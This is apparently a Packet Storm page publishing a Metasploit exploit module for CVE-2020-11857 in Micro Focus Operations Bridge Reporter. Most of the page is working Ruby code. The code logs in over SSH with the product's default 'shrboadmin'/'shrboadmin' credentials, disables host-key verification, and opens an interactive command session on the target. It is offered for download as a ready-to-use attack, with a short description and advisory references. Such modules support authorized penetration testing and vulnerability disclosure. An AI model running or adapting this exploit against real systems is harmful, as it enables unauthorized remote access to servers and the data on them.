exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Micro Focus Operations Bridge Reporter shrboadmin Default Password

Micro Focus Operations Bridge Reporter shrboadmin Default Password
Posted Apr 30, 2021
Authored by Pedro Ribeiro | Site metasploit.com

This Metasploit module abuses a known default password on Micro Focus Operations Bridge Reporter. The shrboadmin user, installed by default by the product has the password of shrboadmin, and allows an attacker to login to the server via SSH. This module has been tested with Micro Focus Operations Bridge Manager 10.40. Earlier versions are most likely affected too. Note that this is only exploitable in Linux installations.

tags | exploit
systems | linux
advisories | CVE-2020-11857
SHA-256 | f916dce1d07e07e927e2802d2dca83cb6a07b9d397ca34c5d01f9b2245b2667b

Micro Focus Operations Bridge Reporter shrboadmin Default Password

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/ssh'
require 'net/ssh/command_stream'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::SSH

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Micro Focus Operations Bridge Reporter shrboadmin default password',
'Description' => %q{
This module abuses a known default password on Micro Focus Operations Bridge Reporter.
The 'shrboadmin' user, installed by default by the product has the password of 'shrboadmin',
and allows an attacker to login to the server via SSH.
This module has been tested with Micro Focus Operations Bridge Manager 10.40. Earlier
versions are most likely affected too.
Note that this is only exploitable in Linux installations.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
],
'References' =>
[
[ 'CVE', '2020-11857' ],
[ 'ZDI', '20-1215' ],
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md' ],
[ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03710590' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find'
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40', {} ],
],
'Privileged' => false,
'DefaultTarget' => 0,
'DisclosureDate' => '2020-09-21'
)
)

register_options(
[
Opt::RPORT(22),
OptString.new('USERNAME', [true, 'Username to login with', 'shrboadmin']),
OptString.new('PASSWORD', [true, 'Password to login with', 'shrboadmin']),
], self.class
)

register_advanced_options(
[
OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end

def rhost
datastore['RHOST']
end

def rport
datastore['RPORT']
end

def do_login(user, pass)
factory = ssh_socket_factory
opts = {
auth_methods: ['password', 'keyboard-interactive'],
port: rport,
use_agent: false,
config: false,
password: pass,
proxy: factory,
non_interactive: true,
verify_host_key: :never
}

opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']

begin
ssh = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh = Net::SSH.start(rhost, user, opts)
end
rescue Rex::ConnectionError
return
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication"
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return
end

if ssh
conn = Net::SSH::CommandStream.new(ssh)
ssh = nil
return conn
end

return nil
end

def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD']

print_status("#{rhost}:#{rport} - Attempt to login to the server...")
conn = do_login(user, pass)
if conn
print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
handler(conn.lsock)
end
end
end
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    0 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close